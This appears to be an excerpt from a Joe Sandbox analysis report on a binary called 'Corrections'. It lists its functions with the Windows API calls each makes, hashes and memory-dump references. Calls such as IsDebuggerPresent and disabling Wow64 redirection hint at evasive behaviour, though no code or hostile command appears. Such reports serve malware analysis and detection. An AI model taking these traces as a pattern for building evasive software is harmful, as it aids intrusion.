GetOpenFileNameW.COMDLG32(?), ref: 0096413B

Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871

Part of subcall function 00923A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00923A76

Strings

X, xrefs: 00964109

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 9d240b0a2d950431f7bb16fe60839d8e67e1db5784d1b120447a20b77e6936c1
Instruction ID: ddf364f064042f93c8f1ee4f0aab09de6387542fdb94a68de6f557cd94ab5405
Opcode Fuzzy Hash: 9d240b0a2d950431f7bb16fe60839d8e67e1db5784d1b120447a20b77e6936c1
Instruction Fuzzy Hash: 6721EB70A042689BCB11DFD4DC05BEE7BFCAF85304F008019E544B7241DBF89A898FA1

Function 0092396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00923A3C

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 7dfb8600159609db5aa2d636dcb7c818f0b9784af702ed0b5c3e3a891dce2fee
Instruction ID: f19f5b0fdc5d4d3a43d6dcbc479656231d6b884602465e14daf9144273e1f2d2
Opcode Fuzzy Hash: 7dfb8600159609db5aa2d636dcb7c818f0b9784af702ed0b5c3e3a891dce2fee
Instruction Fuzzy Hash: EF3193B0519711DFD320DF24E884BA7BBE8FB49718F00092EE5D987241E7B5A948CB52

Function 0092331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 0092333D

Part of subcall function 009232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009232FB
Part of subcall function 009232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00923312

Part of subcall function 0092338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00923368,?), ref: 009233BB
Part of subcall function 0092338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00923368,?), ref: 009233CE
Part of subcall function 0092338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,009F2418,009F2400,?,?,?,?,?,?,00923368,?), ref: 0092343A
Part of subcall function 0092338B: SetCurrentDirectoryW.KERNEL32(?,00000001,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 009234BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00923377

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 8888ff2a59c23c5ab42b945c3544baf855a864f0f318fe0fbf1f485f429ce639
Instruction ID: ea14debc053ec7d9c4485555b447ab96dcdc6b0b844aedbde11343b8a99c9ca9
Opcode Fuzzy Hash: 8888ff2a59c23c5ab42b945c3544baf855a864f0f318fe0fbf1f485f429ce639
Instruction Fuzzy Hash: 31F05EB257D3459FE300AFB0FD0BB743794A740B19F008915B509861E6DBFE9651EB40

Function 0093FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0094007D
Sleep.KERNEL32 ref: 0094008F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseHandleSleep
String ID:
API String ID: 252777609-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: e5eebe1ea8c45f9a6774b7445d44c2fa2ce6b1289486ca029e84000481c5da6a
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7631B271A00105DFD718DF58D490E69FBBAFB99300B2486A9E509CB656E736EDC1CBC0

Function 0092CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0092CEEE

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 9c13a3579134b7cf86406b79243016bb8c0eaf27e282438c3446577762d9676c
Instruction ID: c4813c8ee142fe64b4104c57f27a5a52a1e6bcc1639029755bf3f0227200a043
Opcode Fuzzy Hash: 9c13a3579134b7cf86406b79243016bb8c0eaf27e282438c3446577762d9676c
Instruction Fuzzy Hash: 0232D0B5A04219DFCB24CF18D884ABEB7B9FF85310F158459E90AAB295C778ED41CB90

Function 009A7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 54c847c2b8288e223f69dd772c42e1bee15e5e6676184de34679e1c2be8a1559
Instruction ID: a4e3dddc0191752d213b28ea572c2c36f42aa6d787ae97b8bfdabce4506a55c7
Opcode Fuzzy Hash: 54c847c2b8288e223f69dd772c42e1bee15e5e6676184de34679e1c2be8a1559
Instruction Fuzzy Hash: B3D13B75A04209EFCB14EFD8D882AEDFBB5FF49310F244159E915AB291DB30AE41CB90

Function 0094F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a90385714296aec7f99d2e0eeef24e3ecc7765caffdcd9a0ebd7b9098757f
Instruction ID: d21bb5068cd3543c198cb9cbe07533dc719084a55c7d7e4846c12cdf68429c37
Opcode Fuzzy Hash: c71a90385714296aec7f99d2e0eeef24e3ecc7765caffdcd9a0ebd7b9098757f
Instruction Fuzzy Hash: A951F735A04109AFDB14DF68C860FB97BA5EFC5364F198168E8289B391D771ED42CB90

Function 0098FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0098FCCE

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: b5b96580851caf8b8b4996cade7d285e6dd951d37b08dedede4729db9b0273e7
Instruction ID: ba6713fb0dcf5ea6d699450aa0b214b188433bd9563d3f9dde1f3eccdcce9dc3
Opcode Fuzzy Hash: b5b96580851caf8b8b4996cade7d285e6dd951d37b08dedede4729db9b0273e7
Instruction Fuzzy Hash: C141A4B6500209AFCB11EF68C891AAEB7B8EF84314B11453EE656D7291EB70DE05CB50

Function 00926679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0092663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092664A
Part of subcall function 0092663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0092665C
Part of subcall function 0092663E: FreeLibrary.KERNEL32(00000000,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009262FA,?,00000001,?,?,00000000), ref: 009266AB

Part of subcall function 00926607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926610
Part of subcall function 00926607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00926622
Part of subcall function 00926607: FreeLibrary.KERNEL32(00000000,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926635

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 050fc8ccce5acf5064a5c27955a02b8505fdb07ce68ce3881f231677a1fcb3dc
Instruction ID: a016187ffa669730f4922b1b44903d275cd8d389f8f06b5055f60ceff59ec7b1
Opcode Fuzzy Hash: 050fc8ccce5acf5064a5c27955a02b8505fdb07ce68ce3881f231677a1fcb3dc
Instruction Fuzzy Hash: 7D113672600315ABCF14BF20ED02FAD7BA5AF80710F10882DF582A65CAEF75DA04EB50

Function 00958782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 009587C0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 1f5cf4119ccff8ab8d220bdd18effc01add592d28d3b20b1c1c592f167e3884f
Instruction ID: c5470f9c44a23eca3de206b12593e5188130fa07d644dda6f1a15e24b1581c6a
Opcode Fuzzy Hash: 1f5cf4119ccff8ab8d220bdd18effc01add592d28d3b20b1c1c592f167e3884f
Instruction Fuzzy Hash: 2E11487190420AEFCB05DF59E940A9B7BF8EF48300F1040A9FC09AB311DA31EA25CBA4

Function 00955373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00954FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0095319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00955031

_free.LIBCMT ref: 009553DF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: 40de923f029e7c4c5f1aa1bc87577315748e1117abe0706bef84678bad7dae86
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: EA01FE72500705ABE331DF5AD841A5AFBEDEBC53B1F65052DE984832C1EB706909C774

Function 0094E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 3567e96cfd34ace48d55fec938fdd609fce70ba456e1c4c6a09ed442f2c87b0e
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 3CF0283291162456D6717A3B9C15F6A3398AFC3331F200B26FC25932D1EB74E80687D2

Function 0092B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092B333

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d5c573a76357b4ebf737583c416262f8bd59d7773a00564907891ad84ae160d7
Instruction ID: d09d446e225ba6cc459b7819e0c510311b5f4d2e462ea2c56fa41b7e04b5bc26
Opcode Fuzzy Hash: d5c573a76357b4ebf737583c416262f8bd59d7773a00564907891ad84ae160d7
Instruction Fuzzy Hash: 9AF0C8B36017146ED7149F28DC06FA6BB98EB84360F10852AFB19CB1D1DB31E510CBE0

Function 0099F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0099F987

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: b43d35c0b074a250a18394744c6bb67e22c4a121f5da58e7c66c952615f6a9c5
Instruction ID: 28429626308b034a7506ae16373457c8103671b926a1ad0210eaae2d39902cc8
Opcode Fuzzy Hash: b43d35c0b074a250a18394744c6bb67e22c4a121f5da58e7c66c952615f6a9c5
Instruction Fuzzy Hash: 68F03172604115BFDB05EBA5DC46E9F77B8EFC9720F004055F5059B261DA70A941C751

Function 00954FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0095319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00955031

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4457f4b66ec4589cbc87cc1090ed06b1109e5d2758e0e346953eefccd9f1cfcd
Instruction ID: 22864a8c8d5514590865fd75a7fe4f46b8a6425dd8c8d5addcd08c8c8ff8844f
Opcode Fuzzy Hash: 4457f4b66ec4589cbc87cc1090ed06b1109e5d2758e0e346953eefccd9f1cfcd
Instruction Fuzzy Hash: 45F09032515A24A79A319A77DC21F5A374CAF817A1F174021EC1CE60D2DA64D80997E0

Function 00953B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f7e5f842edd43e09890dfe0b8ce3f2dc7da7f3cde4314562140abf90995b3954
Instruction ID: 5496131665b1c0e52b477f8861c93a79f3751421b3d67bed9242de61738185fa
Opcode Fuzzy Hash: f7e5f842edd43e09890dfe0b8ce3f2dc7da7f3cde4314562140abf90995b3954
Instruction Fuzzy Hash: 15E0ED31214620A7EA21ABB79C01F7A3B4CAF813E2F168921EC04D6091DB70CE0883A0

Function 009266E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d13a4c448eda33b1e6d0cd4e191783f55c8d541661f397231aac55151fc7e79
Instruction ID: 0248f4342261a55d343ebbeafe66ce92d3761565afc1f5345f647a353ec3d071
Opcode Fuzzy Hash: 8d13a4c448eda33b1e6d0cd4e191783f55c8d541661f397231aac55151fc7e79
Instruction Fuzzy Hash: 88F06D71106722CFCB389F68E8A4816BBF8BF143293248E3EE1D786A10C7759840DF50

Function 00976AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00976AE0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3ade1a9faeffbbe271f0776a5446df5bb7f50476173f58f79754f6e9297a6811
Instruction ID: 16865d297994a191153dd469ef449797fcee600e35b2b050c263a05f357fbd4d
Opcode Fuzzy Hash: 3ade1a9faeffbbe271f0776a5446df5bb7f50476173f58f79754f6e9297a6811
Instruction Fuzzy Hash: 44F0E572708A01AAE7304B64A805BA1F7E8EB40315F10891AD4D9C3181D7B644949B51

Function 0092684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00926868

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 3fe8d7f7ca59d5f6d5c05ca9a8e14523b95e8e73141003963251d445f9f51580
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 78F0F87550020DFFDF05DF90C941E9E7B79FB04318F208445F9159A151C336EA21ABA1

Function 00923907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00923963

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

